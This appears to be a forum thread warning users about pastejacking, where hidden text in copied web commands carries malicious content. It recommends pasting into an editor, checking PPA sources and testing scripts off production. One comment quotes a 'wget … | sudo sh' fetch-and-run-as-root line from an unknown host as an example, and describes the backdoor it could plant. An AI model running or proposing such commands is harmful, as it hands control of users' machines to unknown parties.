As a a recent blog post showed in a simple manner: Let me remember you to either paste any CLI commands you copy from a website into an editor or install some sort of checker. Otherwise you might get your unix system easily infected with malware or other shenanigans.
Depends of course a bit on what kind of distro you use aswell I mean Ubuntu based distributions that sometimes needs ppa´s to install certain software. You should indeed allways double check the source of the ppa link firstly.
This of course aside from commands, which you should allways check before use.
You can direct copy if you simple use shift and right arrow from the beginning, the code is hidden after the space so its like this "ls (HIDDEDN TEXT)-lat" If you simply put cursor at the beginning next to LS then shift over you can see that there is more then what is displayed.
Well, sometimes it's just easier to copy something by marking it and pasting it with middle mouse button, for example when downloading a file via http-link. But with default terminal settings, you can engineer a text to contain hidden commands (if you haven't, try the ls -lat command from the website), so I prefer installing an addon than typing 50 character http links ;).
I prefer to paste into a text editor then sanity check before running. Malware is less of a risk than "stupidware". Make sure commands aren't going to cause irreparable damage before running!
These are the magical words. If the user is 'a typical user' It's no trick to, for example, have them click on the wrong thing once and suddenly their keystrokes and all files are transferred over the network, without escalating priviledges, without the user knowing. Imagine if that happened in a corporation.
Particularly if the command includes something along of the lines of wget -O - http://[someunknownwebsite]/install.sh | sudo sh. Before you know it you've created a reverse tunnel back door, added a user, given is full sudo and notified someone at the other end there's a server available for them to play with. You could actually have no visual feed back of what's gone and the last task could well be to write some innocent looking code to the "install.sh". 1. Download code using a non privileged user and preferably not to the server it's going to be run from. 2. View the code and manually download any other packages it's downloading 3. Read it a couple of times through to be certain it's not doing anything untoward 4. Edit the code to ensure that paths/users/IP addys etc are relevant and correct 5. DON'T RUN IT ON A PRODUCTION SERVER WITHOUT HAVING RAN IT SOMEWHERE ELSE AND PEER REVIEWED